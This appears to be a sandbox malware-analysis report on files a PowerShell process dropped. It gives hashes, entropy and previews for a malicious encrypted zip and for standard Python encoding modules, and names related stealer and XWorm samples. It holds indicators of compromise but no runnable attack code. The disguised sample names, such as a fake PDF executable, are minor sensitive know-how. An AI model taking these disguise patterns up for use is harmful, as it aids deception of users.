                                                                                                                                                                                                  C:\Users\Public\Document\Lib\encodings\__init__.pyList Furniture.batGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                    AutoRun.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                      3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        tut.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          8n3W4yKYeB.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            Account_Statement.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              Fusion Client Downloader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                Fusion Client Downloader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  contract_review.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):68971084
                                                                                                                                                                                                                      Entropy (8bit):7.99407438543103
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:1572864:U2FcCalWaQNbExc9vRC6Ny/sWB5rsLfIxrsRG:ZdalmJrnUnB5rsLfIruG
                                                                                                                                                                                                                      MD5:815C5E44DC2107E05478D7130EE7ADA9
                                                                                                                                                                                                                      SHA1:3228FF66461D37D64796FF633B2BBB00E1FE0867
                                                                                                                                                                                                                      SHA-256:D6F6D99846A3FFBB50C48777C858EAD0F4FD539B164D7B40482DAF17B9171AC9
                                                                                                                                                                                                                      SHA-512:A498B8C641C24DA12C942A3FDEFCF7A993BE46D7157D742E6C445A66FB161F49188AF3ED5FA06B8E62CA7CEB219C1CBA9ABDDB2BDA2D2658A8BD7EF816C361B1
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:PK..........fY................tcl/PK..........fY................tcl/dde1.4/PK..........FX..dR............tcl/dde1.4/pkgIndex.tcl...J.1.E....n.tg.0..p.'...H'/...IZ.2.n.. n\.-/..w..2pt...d....Y).NQc....!lfd.............T....'.r:.%..Ac.......h.]a..,Y...Nux.b.T..."$c18.....w.3.....u...%-...........cCW.-..o.}?....c.O...'.C...}.......PK..........FXO?..`1...d......tcl/dde1.4/tcldde14.dll.|.xS..J..e.. .1...D..p.&`b.$,..H`......2v.b..'..Dv.r...IosS.M.i...@H...l.....)mC^E...y....=.% ........V..gwvwvvvvvf.H.U.,.1....0...}........`.Nyu......E5..f_S....zseECC.d^.57....f..Bs}c.7S..fQI$...a........6........."xr...a...\|tq...w_>1w!.=....^*?|.O.."XP[Y../.B.......5..2..d.S.#&..n.S....4LMk...8"..ra.Z...rM.Q.\....2x.v.|..|61..6&..........?.+`.51.|.tZ...L.."...2d...............4Y:<..J..-.Wc-(....+..^G..W.1nR.\{.zM..J>v..[wY..._......j...<.~.A.%..t[...W....].......D.\...(b.....N..a1.!.MQ....bz..X[.PS1......kVS..B.iufu.!S.|lv".2.`[.?u.*,T....e.e..C.5..sf..u.2M....vc.&...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6058
                                                                                                                                                                                                                      Entropy (8bit):4.513858440536954
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:VHdpCpI/qD2Q0pU8F6fdaLcbkCN/yRMffWL1+rpOc6i7AYS2kEJl+iKaN6w1AD4:XpCpIPpHEN/yYi1+NOc6IAYS2kEXR6wr
                                                                                                                                                                                                                      MD5:EA0E0D20C2C06613FD5A23DF78109CBA
                                                                                                                                                                                                                      SHA1:B0CB1BEDACDB494271AC726CAF521AD1C3709257
                                                                                                                                                                                                                      SHA-256:8B997E9F7BEEF09DE01C34AC34191866D3AB25E17164E08F411940B070BC3E74
                                                                                                                                                                                                                      SHA-512:D8824B315AA1EB44337FF8C3DA274E07F76B827AF2A5AC0E84D108F7A4961D0C5A649F2D7D8725E02CD6A064D6069BE84C838FB92E8951784D6E891EF54737A3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: List Furniture.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: AutoRun.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: 3Af7PybsUi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: tut.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: 8n3W4yKYeB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: Account_Statement.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: Fusion Client Downloader.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: Fusion Client Downloader.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: contract_review.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: new.bat, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:""" Standard "encodings" Package.... Standard Python encoding modules are stored in this package.. directory..... Codec modules must have names corresponding to normalized encoding.. names as defined in the normalize_encoding() function below, e.g... 'utf-8' must be implemented by the module 'utf_8.py'..... Each codec module must export the following interface:.... * getregentry() -> codecs.CodecInfo object.. The getregentry() API must return a CodecInfo object with encoder, decoder,.. incrementalencoder, incrementaldecoder, streamwriter and streamreader.. attributes which adhere to the Python Codec Interface Standard..... In addition, a module may optionally also define the following.. APIs which are then used by the package's codec search function:.... * getaliases() -> sequence of encoding name strings to use as aliases.... Alias names returned by getaliases() must be normalized encoding.. names as defined by normalize_encoding().....Writ
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5837
                                                                                                                                                                                                                      Entropy (8bit):5.578903889963503
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:avoHIYGspF3e06Q0Yhh6Yjz/6kVXfOmhfKYnjkwVY5tT6pl02TYbXigaKSDVRoM/:2YLpFkYX6GXVKYnjkwaDeX0Za/pACJh
                                                                                                                                                                                                                      MD5:84768F76569FA801EAB47DE481A5215A
                                                                                                                                                                                                                      SHA1:3F20F4147D74AEADE2CE21A9C839134937DAAC8D
                                                                                                                                                                                                                      SHA-256:97DF04147BD7399198A455A32BA6A79D5C6851428B47404137E4AFCA8D7C6B65
                                                                                                                                                                                                                      SHA-512:A34E96EDC6263702E0C455B187AD20B5EAB2F82CC8126A0FB160B75EE76D2CE5F998D4F219BDEF38CE72EFD77A13F89853F1B94F52E6E187B5C0700276C903A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j...................Z...G.d...d.e.e.........Z.d...Z.d...Z...e.j...................e...........e.j...................d.k(..r.d...Z...e.j...................e...........y.y.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12455
                                                                                                                                                                                                                      Entropy (8bit):6.122373219598486
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:TX2eNkBweGfGkueKm+I14Xqb36RhOgaxL8PZm+/Qnu1iKSWk2lEfBN2ckAaq1YaM:TXG0buenU6uHc+6eOfj2fUYxCwZuiBD
                                                                                                                                                                                                                      MD5:6A4BE0AFF039F7B92AC9F32B305DC0C8
                                                                                                                                                                                                                      SHA1:F1F14175D20E8D2392C366FA8518B91EB2A72D4C
                                                                                                                                                                                                                      SHA-256:4961ACA95D84F3825587A0832BCA1CFBB076DEB3783536F8DB73463ABDF48B75
                                                                                                                                                                                                                      SHA-512:48942B17F5358E577DB87753309B810C05151A7EB021A698D473607E561FF6A28DCA04E411D46F4BCF25E43A68D5D1E742BCED54B7AD6279F545E410354D0A23
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........ed?..............................d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3181
                                                                                                                                                                                                                      Entropy (8bit):5.155165427620733
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:D+kM1qr1Ye1SX82XGbL2JSZpxkTBcArETpmD1l/c4WqDfLTTLTDfLTTp6HbDHbBJ:qko0Y/34Gu7kTiArwcDIjCf33Pf396nf
                                                                                                                                                                                                                      MD5:B761AABDA9F721FFA56F623D8C570175
                                                                                                                                                                                                                      SHA1:9B7C288D4754CE80B9B8CB7BF14F85E7FE3CAFE9
                                                                                                                                                                                                                      SHA-256:E55B77939B3F53AE6DA7B7923A69DBD19ABB3617DE109A85500AB4DD297EA0A7
                                                                                                                                                                                                                      SHA-512:5F8FA395EE3BB2106561367054B422F8C3BBA92246D4FB71CF5135774FDE75A9D9435FC9B3584528C82A9CB7CBD00164EF9E5D80FF55BE11FCD613C35CA9628E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e.5..............................d.Z.d.d.l.Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.e.j...........................Z.d...Z.d.Z...e.j...................e.........Z.y.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc...........................e.Z.d.Z.d.d...Z.d.d...Z.y.)...Codecc.....................8.....t.........j...................|.|.t.................S...N)...codecs..charmap_encode..encoding_table....self..input..errorss.... .VC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\encodings\cp1252.py..encodez.Codec.encode................$..$.U.6....A..A.....c.....................8.....t.........j...................|.|.t.................S.r....).r......charmap_decode..decoding_tabler....s.... r......decodez.Codec.decode....r....r....N)...s
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13331
                                                                                                                                                                                                                      Entropy (8bit):5.609170087287683
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:gamku5TnFk+xNkekcV7UihlYdOEczj+JFnHookioJR1GTnGRtFyz7nRAXE2JHFtC:1gFRCc5ydOBQokEkTnG0HRA0y8T
                                                                                                                                                                                                                      MD5:AABC1F1E9715096926686F574B29AA7B
                                                                                                                                                                                                                      SHA1:4126037C58ACC7AF146F36422F83D2AD2CEEB71D
                                                                                                                                                                                                                      SHA-256:BDB3277AEFDC6B3E7EA91A3B3D3791E756B573C84DB8162663B7F87B1D273312
                                                                                                                                                                                                                      SHA-512:B67EC600116E404169B3317691827CB6E10576ACF97E4B7DF748B9F562FF42C9284166CF7A5EE28EC068F832CB64E688A09295F842E1347B58116AED00546296
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e................................d.Z.d.d.l.Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.e.j...........................Z.d...Z...e.j.....................e.d.................Z.e.j...................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..d-d...d/d0..i.d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF..dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR....i.dFdS..dHdT..dUdV..dJdW..dXdY..dZd[..d\d]..d^d_..dYd`..dadb..d`dc..dddQ..deda..dfdg..dhdi..djdk..dldm....i.dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d[d|..dgd}..dcd~..dbd...d.d...d]d...d.d...d.d...d.d...d.d.....i.d,d...d.d...d4d...d.d...d.d...d0d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...dWd...d.d...d.d...d.d.....i.d.d...dBd...d.d...d.d...d.d...d.d...d.d...dDd...d.d...d.d...d.d...d.d...dPd...d.d...d.d...d.d...d.d.....i.d2dr..d.d...d$d..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9963
                                                                                                                                                                                                                      Entropy (8bit):5.132925772985094
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:+dW06OECxoHAdT3MI+O+vZ31l8ji88u8nyPb:oW06DglhAh8Sd+
                                                                                                                                                                                                                      MD5:A849502326FB603E7E88CD71C0A45DCC
                                                                                                                                                                                                                      SHA1:657AE2B0BA35D976304353B8212C3687E4232A90
                                                                                                                                                                                                                      SHA-256:20B79B041722ABCED16AC86242DDE85BBF466D72E7D12EF39C8CDEA7A1D77EE9
                                                                                                                                                                                                                      SHA-512:C85332F2195D6023D3FEBF97AAAEAACE167AA8A51BA4AF868E8F83F66FC4796AFB092CF51ECD66EE02EF8C24C0971BFE96B33D98519F8E699F81BC503347AB37
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e+'........................B.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.........Z.d.Z.d.Z.d...Z.d...Z.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j"..........................Z...G.d...d.e.e.j$..........................Z.d...Z.y.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c.....................F.....g.}.|.D.]<..}.t.........j...................|.........r...|.j...................t.........j...................|....................>..d.j...................|.........}.t.........j...................d.|.........}.|.D.]...}.t.........j...................|.........s.t.........j...................|.........s.t.........j...................|.........s.t.........j...................|.........sjt.........j...................|.........sUt.........j...................|.........s@t.........j...................|.........s+t.........j...................|........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2194
                                                                                                                                                                                                                      Entropy (8bit):4.6620133517305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:pXaXgOHi/6P2XHApxkMEyzxe15tGPYD+Pw6t2Vj:NawOHQhHA7kMlVgiwx
                                                                                                                                                                                                                      MD5:C391F284A65B8759F7039C52699AE377
                                                                                                                                                                                                                      SHA1:0D78F58E785147E7BA21163A8F43116B14F3724D
                                                                                                                                                                                                                      SHA-256:BB210117F5D66D9C714925608001C9929837EDEEDCCE6F5FF060AD61998E2B47
                                                                                                                                                                                                                      SHA-512:13F457B9B9FAF68EAC5185F8D8D3435ED2FC65F72249B45DB1F78C476E2D034F893188311669843A4BAED4DF1B28B0398C36941A8296D2C906ECE46073C5A113
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e................................d.Z.d.d.l.Z.e.j...................Z.d.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.d...Z.y.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........Nc.....................0.....t.........j...................|.|.d.........S.).NT)...codecs..utf_8_decode)...input..errorss.... .UC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\encodings\utf_8.py..decoder........s................u.f.d..3..3.....c...........................e.Z.d.Z.d.d...Z.y.)...IncrementalEncoderc.....................H.....t.........j...................|.|.j...........................d.....S.).Nr....).r......utf_8_encoder....)...selfr......finals.... r......encodez.IncrementalEncoder.encode....s..........."..".5.$.+.+..6.q..9..9r....N).F)...__name__..__mo
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13420
                                                                                                                                                                                                                      Entropy (8bit):4.5283835755402215
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:RHhsuOTDvR1UZkPS9Dc24sOtV5I8pgYtxj5u1a:ETcc24HXpgY/loa
                                                                                                                                                                                                                      MD5:F453ED24A766166472B48010C7712629
                                                                                                                                                                                                                      SHA1:0F269160E99FA1ACBC12B882AA9ED1976488B11E
                                                                                                                                                                                                                      SHA-256:8C1D85BE11A3A0A5E6A40101C68548480D0378DF0414E3C16D9CBE9F923C028E
                                                                                                                                                                                                                      SHA-512:420CD9363A0D72FCA7B22300CE4AC0868320D945E0FCE4C1F09659D4601168F96993D640BEA0FBF9112948D17DE08A41F674DF5E65D34859B9BFB46D89D120D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1026 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP1026.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1026',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35295
                                                                                                                                                                                                                      Entropy (8bit):4.600149049702432
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:WLsuYDvRH0CnFdiaYzF0wrE0PXRN/h4wcuSMXY3uD8HtIMpWx449jBRWJn4bkVdO:r6MBkjh4wVXYrx0HWJn4AVd0kUMy
                                                                                                                                                                                                                      MD5:127B6641AE648FF494CD9285BE4C61CC
                                                                                                                                                                                                                      SHA1:61464AA653D2AEE959EE90809BDBF98075B1736E
                                                                                                                                                                                                                      SHA-256:5286E2162D53A6B189D83B242BC04AB59A48BBBC4ECF094C11BC1542C0604279
                                                                                                                                                                                                                      SHA-512:335AC036D6D88270E944FF01D3DCF1B1F1DBE38A75C534836E839DEB474E776EEAB76C08AA4BF150CEA33594AAFAB33EFD593246F958956A4894C2E1819B4C96
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec for CP1125...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1125',.. encode=Codec().encode,.. decode=Codec().decode,.. incremental
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13412
                                                                                                                                                                                                                      Entropy (8bit):4.524379090064879
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:sHhsuOTDvRiUZkPS9BC4KNVFIhRrvcE8bV2H2QB:ZTvC4PDcE8bgWQB
                                                                                                                                                                                                                      MD5:C2F88AB320D40C3B1B6394F57A04AF81
                                                                                                                                                                                                                      SHA1:A48B25ABE903EFA9C2B073783087ED06F23BCA0F
                                                                                                                                                                                                                      SHA-256:0451016F6A4B7013DEA1BA35925412FBAD743DDF46E857BE2C272F2A2CB8D403
                                                                                                                                                                                                                      SHA-512:19732A5B121339BD14BD0C7285FD7EE696E7432A28A7B140C92B6206E69011F2FCE50B8B52BCAE7C14DB31444EC9808F27CE07EA4390434ECFBDA096A5E022C6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1140 generated from 'python-mappings/CP1140.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1140',.. encode=Codec(
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13993
                                                                                                                                                                                                                      Entropy (8bit):4.595187696759194
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:mHhsuOTDvR+UrXPLouhIAs2+icI2DCYCTG3RKjV:DTsuhIAlquq4V
                                                                                                                                                                                                                      MD5:164A9C1A625524FCB480DBE56076D738
                                                                                                                                                                                                                      SHA1:C21A1A50BBAC7EF8D1CC3A2E093FE5EBDBBD35C4
                                                                                                                                                                                                                      SHA-256:3FFEA0100ABEF80F916BC2920B296B2EDDD6ECB06FB3CA07549F95FC92CA1F11
                                                                                                                                                                                                                      SHA-512:AB0160965CCED9E7BF45D6A64C34A0AC363B4CF5D2447C303397DB79C5F04ED861D9D0D5FF833C0685029E702534DEFE3EBB5AB5B05C5A5842050221CDC91A5B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1250 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1250.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1250',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13668
                                                                                                                                                                                                                      Entropy (8bit):4.623567935376835
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:YHhsuOTDvRBUrXPLouhIAs2+iEI0DCYnWEDp+/:lTPuhIAlYrWEo/
                                                                                                                                                                                                                      MD5:E81DE8E87BAB1DEFF99125C66229F26E
                                                                                                                                                                                                                      SHA1:5800D009E3D4C428B7303532AAD20BA3BBBE8011
                                                                                                                                                                                                                      SHA-256:46FA091D1822434E8D0AF7A92439607018872598FCDE44026F413DD973F14C98
                                                                                                                                                                                                                      SHA-512:B14BFE809CF20E5FD82CF5E435983DC5FEAA4E5DE19D16AA4BED7FD0CBFD18A429DD0129AA6058053709CE230CE38224F7CE15CFBCD75A803B04ABC85FA9440B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1251 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1251.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1251',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13818
                                                                                                                                                                                                                      Entropy (8bit):4.5698138915249915
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:OHhsuOTDvR8UrXPLouhIAs2+i/I1DCYkZt6VN6ATdo56G:bTeuhIAlcoZt6to
                                                                                                                                                                                                                      MD5:52084150C6D8FC16C8956388CDBE0868
                                                                                                                                                                                                                      SHA1:368F060285EA704A9DC552F2FC88F7338E8017F2
                                                                                                                                                                                                                      SHA-256:7ACB7B80C29D9FFDA0FE79540509439537216DF3A259973D54E1FB23C34E7519
